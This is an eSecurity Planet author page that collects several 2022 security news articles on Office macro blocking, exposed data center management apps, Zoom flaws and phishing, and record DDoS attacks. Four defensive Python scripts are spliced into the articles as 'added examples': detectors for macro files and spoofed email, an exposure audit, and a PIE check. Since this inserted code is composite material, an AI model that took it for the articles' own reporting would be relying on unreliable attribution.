Jeff Burt, Author at eSecurity Planet
https://www.esecurityplanet.com/author/jburt/
Industry-leading guidance and analysis for how to keep your business secure.
Last updated: Wed, 09 Feb 2022 17:59:54 +0000

Microsoft Blocks VBA Macros by Default, Temporarily Shuts Down MSIX Protocol
https://www.esecurityplanet.com/applications/microsoft-blocks-vba-macros-msix-protocol/
Wed, 09 Feb 2022 17:59:54 +0000

Microsoft is shutting a couple of security holes, including one that has been a favored target of attackers for years and another that the enterprise software giant recently learned could be exploited to install a malicious package.

At the same time, the federal government has added another Microsoft flaw to its list of known exploited vulnerabilities, giving federal agencies until Feb. 18 to patch a Win32k elevation-of-privilege bug affecting unpatched versions of Windows 10, and urging private and commercial organizations to remediate every flaw listed in its Known Exploited Vulnerabilities Catalog.

In its alert, the Cybersecurity and Infrastructure Security Agency (CISA) said the decision to add the flaw – tracked as CVE-2022-21882 – was “based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.”

“It appears CISA added this as due diligence, rather than because the attack is a high threat,” Mike Parkin, an engineer at cybersecurity vendor Vulcan Cyber, told eSecurity Planet. “Microsoft’s explanation indicates that the attack requires local access and is of high complexity, both of which reduce the likelihood of it being widely used in the wild. Patches are available and they should be deployed as part of any organization’s standard maintenance procedure.”


Disabling VBA Macros

One of the moves Microsoft officials announced this week is a plan to block Visual Basic for Applications (VBA) macros by default in a range of Office applications. The change applies to VBA macros in files obtained from the internet, which Office identifies by the Mark of the Web that browsers and mail clients attach to downloaded files. Users will no longer be able to enable that content with a single click of a button; instead, a message bar will appear directing them to learn more about the risk.

“The default is more secure and is expected to keep more users safe including home users and information workers in managed organizations,” Kellie Eickmeyer, a principal program manager at Microsoft, wrote in a blog post. “For years Microsoft Office has shipped powerful automation capabilities called active content, the most common kind are macros. While we provided a notification bar to warn users about these macros, users could still decide to enable the macros by clicking a button.”

Threat actors embed macros in Office files sent to users, who could enable them with one click and trigger delivery of a malicious payload.

“The impact can be severe including malware, compromised identity, data loss, and remote access,” Eickmeyer wrote.

The change is part of a recent pattern by Microsoft, which has begun taking security into its own hands, as users can be slow to install critical patches (see Microsoft Makes Exchange Server Patches Less Optional).

Security By Default

The change will begin rolling out in Version 2203, starting with Current Channel (Preview) in early April and reaching the other update channels (Current Channel, Monthly Enterprise Channel and Semi-Annual Enterprise Channel) later. It affects Office on devices running Windows, specifically Access, Excel, PowerPoint, Word and Visio.

Security professionals applauded Microsoft’s decision.

“One of the important but underappreciated aspects of cybersecurity is that defaults matter – and sometimes matter a lot,” Oliver Tavakoli, CTO at cybersecurity firm Vectra, told eSecurity Planet. “Seemingly 50-50 decisions made by product managers at application and platform providers can expose their customers to extraordinary risk. As the example of VBA macros demonstrates, once such a choice has been made, it’s a difficult and lengthy process to change the default to something more secure as the fear of breaking things creates a form of institutional paralysis.”

The equation is a simple one, Tavakoli said: “Leave features which may have security implications off by default and let customers choose whether the benefit of the feature outweighs the security risk of having it on.”

Overdue Security Change

Ray Kelly, a Fellow at NTT Application Security, told eSecurity Planet that “VBA macros have been a target for hackers for over two decades, easy to code and run with the current users’ permissions. Blocking macros by default is a good move at the cost of inconvenience and can potentially protect a user from ransomware or data loss.”

Jon Gaines, senior application security consultant at nVisium, noted that for red teams at many organizations, macros have been a useful tool in security training. He also dinged Microsoft for taking too long to disable VBA macros.

“Macros have been a threat to Office users for many years,” Gaines told eSecurity Planet. “Good on [Microsoft] for finally implementing this, but I don’t think it gets end users out of danger completely. It’s important to note that this only affects Office files downloaded from the internet, which have already had a warning if it contains a macro at this time. However, making it more than one click to execute the macros is a great step.”
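The scope Gaines describes, files carrying the Mark of the Web and containing a VBA project, is something a mail gateway or endpoint detection rule can reproduce. The following is an added example, not code from the article or from Microsoft: it inspects an Office Open XML container for a VBA project and parses the Zone.Identifier stream that Windows writes to downloaded files. It assumes Office blocks on ZoneId 3 (Internet) and 4 (Restricted sites), assumes the Visio part name matches the other applications, and constructs its sample documents in memory.

```python
"""Detect macro-bearing Office Open XML files and decide whether the new
Office default (block macros in files from the internet) would stop them.

Added example, not code from the article or from Microsoft. Assumptions:
Office keys the "from the internet" decision on the Zone.Identifier stream
(Mark of the Web) with ZoneId 3 (Internet) or 4 (Restricted sites); the
documents below are constructed in memory; the Visio part name is assumed.
"""
import io
import re
import zipfile
from typing import Optional

# Package parts that carry VBA code; the prefix depends on the application.
VBA_PARTS = {"word/vbaProject.bin", "xl/vbaProject.bin",
             "ppt/vbaProject.bin", "visio/vbaProject.bin"}
MACRO_CONTENT_TYPE = re.compile(r"macroEnabled", re.IGNORECASE)
BLOCKED_ZONES = {3, 4}  # Internet, Restricted sites


def has_vba_project(doc_bytes: bytes) -> bool:
    """True if an Office Open XML container carries a VBA project."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
            names = set(z.namelist())
            if names & VBA_PARTS:
                return True
            # Fallback: an unusual layout still declares a macro-enabled
            # content type in [Content_Types].xml.
            if "[Content_Types].xml" in names:
                ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
                return bool(MACRO_CONTENT_TYPE.search(ct))
    except zipfile.BadZipFile:
        pass  # legacy binary .doc/.xls is OLE, not zip: use oletools for those
    return False


def zone_id(zone_identifier: Optional[str]) -> Optional[int]:
    """Parse ZoneId from the text of a Zone.Identifier stream."""
    if not zone_identifier:
        return None
    m = re.search(r"^ZoneId=(\d+)", zone_identifier, re.MULTILINE)
    return int(m.group(1)) if m else None


def macro_blocked_by_default(doc_bytes: bytes, zone_identifier: Optional[str]) -> bool:
    """True if the new default would refuse to run this file's macros."""
    return has_vba_project(doc_bytes) and zone_id(zone_identifier) in BLOCKED_ZONES


def read_motw(path: str) -> Optional[str]:
    """Read the Zone.Identifier alternate data stream (NTFS only); None if absent."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def build_docx(with_macro: bool) -> bytes:
    """Construct a minimal Office Open XML container for the demo."""
    ct = ('<?xml version="1.0"?><Types><Override PartName="/word/document.xml" '
          'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>'
          if with_macro else '<?xml version="1.0"?><Types></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", ct)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


# Constructed Zone.Identifier contents as a browser would write them.
INTERNET_MOTW = "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://example.com/\r\n"

if __name__ == "__main__":
    docm = build_docx(with_macro=True)
    print("downloaded .docm blocked:", macro_blocked_by_default(docm, INTERNET_MOTW))
    print("same file with no MOTW blocked:", macro_blocked_by_default(docm, None))
```

The second print line is the caveat Gaines raises: the same file arriving without a Mark of the Web (copied from a share, extracted from an archive that strips the stream, or opened on a non-NTFS volume) is not covered by the new default, so the detection side still has to look at the macro itself. Legacy binary formats are OLE containers rather than zips and need a tool such as oletools' olevba.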



Temporary Shutdown for MSIX

Late last week, Microsoft also announced it was temporarily turning off the ms-appinstaller protocol handler used by Windows App Installer for MSIX packages, after learning that a security flaw in it was being exploited by cybercriminals to deliver malware such as Emotet (a Trojan spread via email), TrickBot (a banking Trojan) and BazaLoader (a loader whose infections can end in data theft or ransomware).

In a blog post, Dian Hartono, a program manager at Microsoft, wrote that the vendor learned an attacker could spoof App Installer to install a package that a user didn’t want to install. The vulnerability is being tracked as CVE-2021-43890.

“We are actively working to address this vulnerability,” Hartono wrote. “For now, we have disabled the ms-appinstaller scheme (protocol). This means that App Installer will not be able to install an app directly from a web server. Instead, users will need to first download the app to their device, and then install the package with App Installer. This may increase the download size for some packages.”

With the MSIX app package, some legacy Windows applications can get “modern packaging and deployment features,” giving enterprises a way to ensure their applications are up-to-date and ensure an easy installation process.

“The ms-appinstaller protocol handler was introduced to enable users to seamlessly install an application by simply clicking a link on a website,” Hartono wrote. “What this protocol handler provides is a way for users to install an app without needing to download the entire MSIX package. This experience is popular, and we are thrilled that it has been adopted by so many people today.”

Microsoft said it will re-enable the protocol once it is satisfied the flaw has been fixed. It is also considering a Group Policy setting that would let IT administrators re-enable the protocol and control its use inside their organizations.

Thousands of Data Center Management Apps Exposed to Internet
https://www.esecurityplanet.com/networks/data-center-management-apps-exposed-to-internet/
Wed, 02 Feb 2022 19:50:55 +0000

Tens of thousands of applications that are critical to the operations of data centers around the globe are exposed to the internet, with many secured with default factory passwords, posing a significant cyber risk to enterprises worldwide.

Researchers with cybersecurity firm Cyble this week said that along with the public-facing data center infrastructure management (DCIM) software, they also found intelligent monitoring devices, thermal cooling management systems and rack power monitors that were exposed and vulnerable to cyberattack.

The discovery of the more than 20,000 DCIM software instances and products exposed to the internet makes it highly likely that there will be “increasing cyber threats towards data centers worldwide,” investigators with Cyble Research Labs wrote in a blog post.

“Globally data centers are becoming faster, smarter, and highly scalable but this development comes at a price, as with great power comes significant responsibilities and greater risks of cyberattacks,” they wrote. “As data centers work with the collaboration of multiple technologies and software, vulnerabilities and loopholes can be easily found by malicious hackers. Moreover, data centers are rapidly upgrading. Hence hackers are exploring new vectors to bypass the security parameters.”


Growing Presence of DCIM Software

DCIM is becoming an increasingly important part of data center management. The software tools address both IT and facilities operations, managing and controlling such data center components as servers, storage, routers and switches, along with heating, ventilation and air conditioning (HVAC) systems, uninterruptible power supply (UPS) systems, sensors, transfer switches (used to redirect a power load to an alternate source) and server rack monitoring solutions.

According to market research firm KVB Research, the global DCIM market is expected to grow an average of 21.7 percent a year through 2026, when it will hit $4.4 billion. The analysts wrote that the rising demand for data center virtualization, the ongoing migration of business into private clouds and the drive to improve cost efficiencies within the data center are helping to fuel the market growth.

Because of the reach DCIM software has in data centers, it is getting the attention of threat actors, according to the Cyble researchers. For example, hacktivists could launch an attack on a specific data center’s HVAC system in retaliation for some actions by a person or group connected to the facility. Ransomware gangs could block IT and facilities managers from DCIM applications and demand money to regain access, and hackers could get access to highly sensitive data.

State-sponsored groups could disrupt power to critical data center components and cause a shutdown of the site, they wrote.

“Data centers are the most important critical infrastructure for the nation and the organization using the data center facilities,” the researchers wrote. “A successful attack on this vital sector can lead to the loss of a considerable amount of money. The data stored and processed in the data centers can be corrupted and destroyed, which can cause a severe impact on the organization’s brand reputation. Hackers can even delete the traces of their attack by deleting the logs from … web consoles.”


Public-Facing Software a Threat

Data centers also run many products from many vendors, which widens the attack surface available to cybercriminals. Security professionals told eSecurity Planet that leaving these applications exposed to the internet is a dangerous move by data center operators and vendors alike.

“There can be no real security if physical security of a system is compromised,” said John Bambenek, principal threat hunter for cybersecurity company Netenrich. “These systems provide attackers a good deal of insight into the physical layer of data center operations and, in some cases, allow them to make changes that can compromise the underlying systems. It’s been a best practice not to put things on the Internet, accessible to the world and protected by default credentials since the ’90s. This is laziness at its worst.”


Sounil Yu, CISO for cybersecurity vendor JupiterOne, said that “It’s easy to lose sight of these applications without a good asset management program. It’s worse with DCIM tools, since they are part of one’s control plane. Exposing that to the public internet is like allowing terrorists to direct air traffic control.”


APC by Schneider, Sunbird, Liebert on List

Cyble’s researchers said they detected instances of software from Sunbird, Liebert, APC by Schneider, Vertiv and Device42 that could be accessed by threat actors on the outside. APC by Schneider accounted for more than half the public-facing instances found by the researchers.

They also found instances of public-facing software from Device42, Liebert’s CRV-iCOM cooling solution and smart UPS still running factory default passwords. They were “able to find several instances exposed over the internet while investigating the scope of attacks on data centers all over the globe. Default passwords protected these data centers. Some of the products found were outdated, allowing hackers or malicious groups to exploit the data center’s systems further.”

In addition to building and room security, monitoring server racks is critical, because data storage and processing equipment is installed in racks, the researchers noted. “A change in external parameters could cause severe damage,” they said. “For example, an increase in temperature might cause the chips inside to melt and bring the entire system to a halt. Furthermore, the chips’ processing power slows down and loses efficiency if they run too cold.”

They found multiple exposed web interfaces used for rack monitoring, with the interfaces using default passwords, “making it easy for a hacker to gain insights into a data center. As there are multiple sensors, power units, networking devices, CCTV cameras connected to these portals, there is a lot of scope for a hacker to gain sensitive information about the components within the data center and their working.”

Reconsider Web Exposure

The Cyble researchers noted that even organizations that are already spending millions of dollars to protect their data centers and ensure there are no downtimes or security breaches need to take a holistic view of their facilities and look for openings that threat actors could exploit.

Enterprises need to adopt a risk management framework, such as NIST’s Risk Management Framework (RMF), as well as run security awareness programs, patch vulnerabilities, implement access controls on connected systems, segment their networks and run regular audits. The researchers also urged strong password policies, vulnerability assessment programs and the use of threat intelligence.


And they should reconsider exposing applications and instances to the internet at all.

“Public-facing web instances are a significant threat for the critical sectors which go unaddressed by the security teams,” they wrote. “Doing so puts the complete environment at risk of cyber-attack. Checking assets exposure is very important in these sectors.”
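Checking asset exposure, as the researchers put it, starts with an inventory of every management interface and a rule for what counts as reachable from outside. The following is an added example, not code from Cyble's research: it audits a constructed inventory of DCIM consoles, rack monitors, UPS and PDU web UIs against an assumed management VLAN, and flags interfaces that sit outside internal address space or still use vendor default credentials. Exposure is judged against an explicit list of internal ranges rather than Python's `ipaddress.is_global`, because Python classifies the RFC 5737 documentation addresses used in the sample as non-global.

```python
"""Audit an inventory of data center management interfaces (DCIM consoles,
rack monitors, UPS and PDU web UIs) for exposure outside the management network.

Added example, not from Cyble's research. The inventory lines and management
CIDRs are constructed for a hypothetical site. Exposure is judged against an
explicit list of internal ranges rather than ipaddress.is_global, because
Python treats the RFC 5737 documentation addresses used here as non-global.
"""
import ipaddress
from typing import List, NamedTuple, Tuple

INTERNAL_RANGES = [ipaddress.ip_network(c) for c in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "100.64.0.0/10",                                    # carrier-grade NAT
    "127.0.0.0/8", "169.254.0.0/16",                    # loopback, link-local
)]
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}


class Finding(NamedTuple):
    asset: str
    address: str
    severity: str
    reason: str


def parse_inventory(text: str) -> List[Tuple[str, str, int, bool]]:
    """Parse 'name, ip, port, default_creds(yes/no)' lines; '#' starts a comment."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, ip, port, default_creds = [p.strip() for p in line.split(",")]
        rows.append((name, ip, int(port), default_creds.lower() == "yes"))
    return rows


def is_internal(addr) -> bool:
    return any(addr in net for net in INTERNAL_RANGES)


def audit(inventory: str, management_cidrs: List[str]) -> List[Finding]:
    mgmt = [ipaddress.ip_network(c) for c in management_cidrs]
    findings = []
    for name, ip, port, default_creds in parse_inventory(inventory):
        addr = ipaddress.ip_address(ip)
        exposed = not is_internal(addr)
        reasons = []
        if exposed:
            reasons.append(f"reachable outside internal ranges, web console on port {port}")
        elif not any(addr in net for net in mgmt):
            reasons.append("internal address but outside the management VLANs")
        if default_creds:
            reasons.append("vendor default credentials still set")
        if not reasons:
            continue
        if exposed and default_creds:
            severity = "critical"   # anyone on the internet can log in
        elif exposed or default_creds:
            severity = "high"
        else:
            severity = "medium"
        findings.append(Finding(name, ip, severity, "; ".join(reasons)))
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f.severity], f.asset))


# Constructed inventory for the demo; 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges standing in for public addresses.
SAMPLE_INVENTORY = """\
# name, ip, port, default_creds
dcim-core, 10.20.0.5, 443, no
rack-monitor-r12, 10.20.1.40, 80, yes
ups-hall-b, 203.0.113.77, 443, yes
crv-cooling-1, 198.51.100.8, 443, no
pdu-r07, 10.30.5.9, 80, no
"""
MGMT_CIDRS = ["10.20.0.0/16"]  # assumed management VLAN for the hypothetical site

if __name__ == "__main__":
    for f in audit(SAMPLE_INVENTORY, MGMT_CIDRS):
        print(f"{f.severity:8} {f.asset:18} {f.address:15} {f.reason}")
```

An interface on an internal address that is outside the management VLAN is still a finding: it is reachable from the general office network, which is where a phishing foothold usually lands. Feed the same inventory to an external scan of the public ranges to confirm the console is actually answering on that port; the audit above only reasons about addresses.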

Zoom Security Issues Are a Wakeup Call for Enterprises
https://www.esecurityplanet.com/threats/zoom-security-issues-a-wakeup-call-for-enterprises/
Sat, 29 Jan 2022 00:33:20 +0000

Video conferencing vendor Zoom has seen its fortunes soar amid the remote work boom of the last two years, and other cloud collaboration platforms like Microsoft Teams and Cisco Webex have seen demand skyrocket too.

The sharp increase in demand put a focus on security shortcomings in Zoom’s architecture – “Zoombombing” became a thing – that the company was quick to address.

But recent reports by security researchers highlight not only other vulnerabilities in Zoom’s offerings, but also the threat posed by the connected nature of cloud-based collaboration technologies. And with a hybrid workforce that’s likely here to stay, these issues raise bigger questions about security practices in a widely distributed workforce.

A Focus on Zoom

Earlier this month, Natalie Silvanovich, a researcher with Google’s Project Zero bug-hunting initiative, published an analysis of two zero-click vulnerabilities in the video conferencing platform that could have enabled threat actors to take control of a victim’s Zoom clients and multimedia routers (MMRs).

A little more than a week later, cybersecurity firm Armorblox outlined a credential-phishing campaign that used a spoofed Zoom notification as its social engineering lure.

In Armorblox’s case, Zoom itself wasn’t compromised. Instead, its wide-ranging use by enterprises led threat actors to send emails with spoofed addresses that enticed victims into clicking a link to a fake login page.

“With Zoom becoming one of the most prevalent tools for businesses to connect via video conferencing, attackers seized the opportunity to target users with a malicious phishing scam … with the goal of stealing victims’ Microsoft Teams account credentials,” Lauryn Cash, product marketing manager at Armorblox, wrote in a blog post.


Vulnerabilities Found on Platform

In her analysis, Project Zero’s Silvanovich noted that with many other video conferencing platforms, one user will initiate a call that others immediately accept or reject. But Zoom calls are usually scheduled in advance and users join through an email invitation.

“In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user,” she wrote. “However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface.”

Her own investigation found two vulnerabilities: a buffer overflow that affected both clients and MMR servers, and an information leak that an attacker could exploit on MMR servers. Neither required user interaction, and an attacker could reach a target’s Zoom account through connections with Zoom Contacts.

Both vulnerabilities were reported to Zoom, which fixed them on Nov. 24.

Flaws on MMR Servers a Concern

Silvanovich wrote that the vulnerabilities in Zoom’s MMR servers were particularly concerning. The servers process meeting audio and video content, which means that an attacker who compromised the system could monitor any Zoom meetings that didn’t have end-to-end encryption. The servers also lacked address space layout randomization (ASLR), which would make it easier for a threat actor to exploit memory corruption vulnerabilities.

Zoom recently enabled it, she wrote. Still, it was a concern that ASLR hadn’t already been enabled.

“ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective,” Silvanovich wrote. “There is no good reason for it to be disabled in the vast majority of software. … All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.”
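The check Silvanovich is describing is cheap to automate for your own server fleet. The following is an added example, not code from Project Zero or Zoom, and it assumes Linux: ASLR only randomizes an executable's code and data addresses if the binary was linked position-independent (ELF type ET_DYN rather than ET_EXEC) and the kernel's randomize_va_space sysctl is at its full setting. The ELF headers in the sample are constructed byte strings, not real binaries.

```python
"""Check whether a Linux ELF executable is built position-independent, which
is the prerequisite for ASLR to randomize its code and data addresses.

Added example, not from Project Zero or Zoom. Assumptions: a 32- or 64-bit
ELF file on Linux; the sample headers below are constructed byte strings.
"""
import struct
from typing import Optional

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3   # fixed-address executable vs. relocatable (PIE)


def elf_type(data: bytes) -> Optional[int]:
    """Return e_type from the ELF header, or None if this is not an ELF file."""
    if len(data) < 18 or data[:4] != ELF_MAGIC:
        return None
    endian = "<" if data[5] == 1 else ">"   # EI_DATA: 1 = little, 2 = big
    return struct.unpack(endian + "H", data[16:18])[0]


def is_pie(data: bytes) -> bool:
    """ET_DYN executables are loaded at a random base; ET_EXEC are not."""
    return elf_type(data) == ET_DYN


def aslr_enabled(randomize_va_space: str) -> bool:
    """Interpret /proc/sys/kernel/randomize_va_space: 0 off, 1 partial, 2 full."""
    return randomize_va_space.strip() == "2"


def aslr_effective(data: bytes, randomize_va_space: str) -> bool:
    """Both the binary and the kernel setting must cooperate."""
    return is_pie(data) and aslr_enabled(randomize_va_space)


def fake_elf_header(e_type: int, little_endian: bool = True) -> bytes:
    """Construct just enough of an ELF64 header for the checks above."""
    ident = ELF_MAGIC + bytes([2, 1 if little_endian else 2, 1]) + b"\x00" * 9
    return ident + struct.pack(("<" if little_endian else ">") + "H", e_type) + b"\x00" * 46


def check_file(path: str, sysctl_path: str = "/proc/sys/kernel/randomize_va_space") -> bool:
    """Read a real binary and the live kernel setting (Linux hosts only)."""
    with open(path, "rb") as f:
        header = f.read(64)
    try:
        with open(sysctl_path) as f:
            setting = f.read()
    except OSError:
        setting = "0"   # no sysctl available: treat ASLR as off
    return aslr_effective(header, setting)


if __name__ == "__main__":
    print("PIE, full ASLR:", aslr_effective(fake_elf_header(ET_DYN), "2\n"))
    print("non-PIE, full ASLR:", aslr_effective(fake_elf_header(ET_EXEC), "2\n"))
```

`readelf -h` reports the same field as `Type: DYN (Position-Independent Executable file)` or `EXEC`; the point of scripting it is to run the check across every service binary in a deployment pipeline and fail the build on ET_EXEC, which is the state Silvanovich found the MMR servers in. A shared library is also ET_DYN, so apply the check to the executables you launch, not to every ELF on disk.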

Zoom’s Broad Use Leveraged in Phishing Attempt

In Armorblox’s research, the attackers used an email with a socially engineered lure, spoofing the sender address and replicating the subject line of a legitimate Zoom notification.

“The email took advantage of the end users’ natural instinct (in any Zoom call) to start the meeting,” Armorblox’s Cash wrote. “When the user clicked on the link to start the meeting, they fell into the trap of the malicious attack and were navigated to a landing page that mimics a Microsoft Outlook login screen.”

The email bypassed Microsoft’s email security controls, she wrote: the messages skipped spam filtering because Microsoft’s controls determined they came from a safe sender, went to a safe recipient, or originated from a mail server on the IP Allow List.

About 10,000 emails were sent to an online mortgage brokerage company in North America, according to Armorblox.
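An allow-list or safe-sender rule lets a message skip filtering, but it does not change what the headers say, so a header triage is worth running on exactly the mail those rules wave through. The following is an added example, not code from Armorblox: it checks whether the From domain agrees with the envelope sender (Return-Path) and Reply-To, whether a brand named in the display name matches the domain it really sends from, and whether the Authentication-Results header (RFC 8601) shows DKIM and DMARC passing. Both messages are constructed for the demo, and the brand-to-domain table is an assumption.

```python
"""Triage a suspected spoofed notification email from its headers: does the
From domain agree with the envelope sender and Reply-To, and did DKIM and
DMARC actually pass for that domain?

Added example, not from Armorblox. The two messages below are constructed for
the demo; the brand-to-domain table is an assumption for the demo.
"""
import email
import re
from typing import Dict, List

# Brands whose notifications get impersonated, and the domains they send from.
IMPERSONATED = {"zoom": ["zoom.us"]}


def _domain(header_value: str) -> str:
    """Domain of the first address in a header value, lower-cased."""
    m = re.search(r"@([A-Za-z0-9.-]+)", header_value or "")
    return m.group(1).lower() if m else ""


def auth_results(value: str) -> Dict[str, str]:
    """Parse 'spf=pass ...; dkim=fail ...; dmarc=none ...' (RFC 8601) into a dict."""
    results = {}
    for method in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{method}=(\w+)", value or "")
        if m:
            results[method] = m.group(1).lower()
    return results


def triage(raw: str) -> List[str]:
    """Return the reasons this message looks spoofed; an empty list means clean."""
    msg = email.message_from_string(raw)
    from_hdr = msg.get("From", "")
    from_dom = _domain(from_hdr)
    envelope_dom = _domain(msg.get("Return-Path", ""))
    reply_dom = _domain(msg.get("Reply-To", ""))
    auth = auth_results(msg.get("Authentication-Results", ""))
    findings = []
    # Display name claims a brand, but the address is not on that brand's domain.
    for brand, domains in IMPERSONATED.items():
        if brand in from_hdr.lower() and not any(
                from_dom == d or from_dom.endswith("." + d) for d in domains):
            findings.append(f"display name invokes {brand} but From domain is {from_dom}")
    if envelope_dom and envelope_dom != from_dom:
        findings.append(f"Return-Path domain {envelope_dom} differs from From domain {from_dom}")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    if auth.get("dkim") != "pass":
        findings.append(f"DKIM result is {auth.get('dkim', 'missing')}")
    if auth.get("dmarc") != "pass":
        findings.append(f"DMARC result is {auth.get('dmarc', 'missing')}")
    return findings


# Constructed sample: a lookalike domain, a third-party bounce address, no DKIM.
SPOOFED = """\
Return-Path: <bounce@mailer-example.net>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=mailer-example.net; dkim=none; dmarc=none header.from=zoom-meetings-example.net
From: "Zoom" <no-reply@zoom-meetings-example.net>
Reply-To: support@mailer-example.net
To: jane@example.com
Subject: Your meeting is ready to start

Click "Start Meeting" to join.
"""

# Constructed sample of what a genuine notification's headers look like.
LEGIT = """\
Return-Path: <no-reply@zoom.us>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=zoom.us; dkim=pass header.d=zoom.us; dmarc=pass header.from=zoom.us
From: "Zoom" <no-reply@zoom.us>
To: jane@example.com
Subject: Your meeting is ready to start

Click "Start Meeting" to join.
"""

if __name__ == "__main__":
    print("spoofed:", triage(SPOOFED))
    print("legit:", triage(LEGIT))
```

Note that SPF passing is not evidence of legitimacy here: SPF is evaluated against the Return-Path domain, which the attacker controls, so the spoofed sample passes SPF and still fails every other check. DMARC is the result that ties authentication to the visible From domain, which is why the triage keys on it.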

[Image: Spoofed Zoom email]

Ubiquitous Adoption at Issue

“The ubiquitous adoption of Zoom as the preferred tool for remote collaboration was used by the malicious actor to socially engineer and email as a trusted sender,” Cash wrote. “The specific call to action (CTA), ‘Start Meeting,’ was strategically used due to it being a common business workflow carried out every day.”

That ubiquitous nature and broad reach within the enterprise should not be overlooked as part of the attack surface, cybersecurity professionals said.

“Zoom accounts and users don’t exist in isolation,” Erkang Zheng, founder and CEO of asset management platform vendor JupiterOne, told eSecurity Planet. “Instead, they’re cyber assets and should be viewed in the context of direct and indirect relationships. A single Zoom account might only be used by one employee; however, that employee is connected to countless other cyber assets, such as Microsoft Teams, devices, cloud resources and sensitive data repositories.”

Zoom, Customers Must Address Risks

Oliver Tavakoli, CTO at cybersecurity vendor Vectra, said many collaboration platforms are relatively new, which makes them less familiar to security professionals at companies.

“Tools which organizations use to conduct normal business have always been targets for attackers as any odious activity within such communication channels tends to intermingle with normal traffic patterns,” Tavakoli told eSecurity Planet. “Collaboration platforms, such as Zoom, which during the pandemic have become more central to how businesses operate, are poorly understood by security teams in terms of the attack surface they present. These tools are also relatively immature in terms of accompanying security protections provided by third parties.”

He said it’s incumbent on vendors like Zoom to put more effort into providing greater security controls to lock down their environments and to add more telemetry to monitor it and block attacks.

Social Engineering Not Going Away

Hank Schless, senior manager of security solutions at cybersecurity vendor Lookout, also warned that social engineering will remain a significant challenge for IT and security teams, because it works for the bad actors and they keep getting better at it.

“Threat actors know that social engineering is most effective on personal channels such as social media, third-party messaging apps, and even dating apps,” Schless told eSecurity Planet. “Organizations that allow employees to use their own smartphones and tablets for work in a bring-your-own-device [BYOD] scenario are at even greater risk, as employees have both personal and work apps on those devices.”

Applications like Zoom also will continue to be a problem, as attackers increasingly build phishing campaigns around fake links to commonly used platforms.

“In the age of hybrid work, we’ve been conditioned to automatically click into any link from Zoom, Google Docs, Microsoft Office and more,” he said. “Attackers know this and use the inherent trust we have in seeing those names against us.”

Microsoft Fights Off Another Record DDoS Attack as Incidents Soar
https://www.esecurityplanet.com/threats/microsoft-fights-off-another-record-ddos-attack/
Fri, 28 Jan 2022 23:13:56 +0000

Microsoft in November fended off a massive distributed denial-of-service (DDoS) attack in its Azure cloud that officials said was the largest ever recorded, the latest in a wave of record attacks that washed over the IT industry in the second half of 2021.

The enterprise software and cloud giant said in a blog post this week that during the last six months of the year, there was a 40 percent increase in the number of DDoS attacks worldwide over the first half of 2021, with an average of 1,955 attacks per day and a maximum of 4,296 on Aug. 10. Microsoft itself mitigated 359,713 unique attacks against its infrastructure between July and December, a 43 percent jump from the first half of 2021.

The DDoS activity was also unprecedented in its complexity and frequency, Anupam Vij, principal PM manager, and Syed Pasha, principal network engineer, both with Azure Networking, wrote in the blog post.

They noted that the “availability of DDoS for-hire services as well as the cheap costs – at only approximately $300 USD per month – make it extremely easy for anyone to conduct targeted DDoS attacks.”

New Record Attack

Azure officials in October reported that they were able to mitigate a 2.4 terabit-per-second DDoS attack against a European cloud customer that originated in the Asia-Pacific region. That attack was 140 percent larger than a 1 Tbps attack in 2020 and larger than any similar event ever detected on the Azure public cloud, they said.

Since then, Azure was able to stave off three larger attacks, including one in November that hit a throughput of 3.47 Tbps and had a packet rate of 240 million packets per second (pps). It targeted an Azure customer in Asia.

“This was a distributed attack originating from approximately 10,000 sources and from multiple countries across the globe, including the United States, China, South Korea, Russia, Thailand, India, Vietnam, Iran, Indonesia, and Taiwan,” Vij and Pasha wrote.

The DDoS assault used multiple attack vectors for User Datagram Protocol (UDP) reflection, including Simple Service Discovery Protocol (SSDP), Connection-less Lightweight Directory Access Protocol (CLDAP), Domain Name System (DNS), and Network Time Protocol (NTP). There was one peak in the attack, which lasted about 15 minutes.


Two Other Big DDoS Attacks

There also were two other large attacks in December. A UDP attack in Asia reached 3.25 Tbps and lasted more than 15 minutes across four main peaks, the highest at 3.25 Tbps and the second at 2.54 Tbps. The other was a 2.55 Tbps UDP flood that lasted just over five minutes.

The attacks were part of a larger and changing DDoS landscape that not only is seeing rapidly increasing numbers of incidents but also greater sophistication and a shift away from times when such incidents typically occur.

“Interestingly, there was not as much of a concentration of attacks during the end-of-year holiday season compared to previous years,” they wrote. “We saw more attacks in Q3 than in Q4, with the most occurring in August, which may indicate a shift towards attackers acting all year round – no longer is holiday season the proverbial DDoS season! This highlights the importance of DDoS protection all year round, and not just during peak traffic seasons.”


Time and Intensity Increase

